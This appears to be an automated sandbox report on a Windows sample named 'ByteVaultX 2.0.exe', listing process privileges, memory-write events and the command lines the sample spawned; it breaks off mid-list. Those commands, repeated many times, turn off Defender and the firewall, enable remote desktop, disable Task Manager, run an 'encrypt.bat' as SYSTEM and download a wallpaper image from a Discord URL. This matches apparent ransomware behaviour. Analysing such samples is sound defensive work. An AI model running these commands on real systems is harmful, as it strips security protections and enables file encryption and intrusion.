Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4972 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 4972 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2212 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2212 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2212 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2212 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 4292 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 224 wrote to memory of 796 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4292 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4292 wrote to memory of 668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4292 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4292 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4292 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 416 wrote to memory of 1932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 416 wrote to memory of 1932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

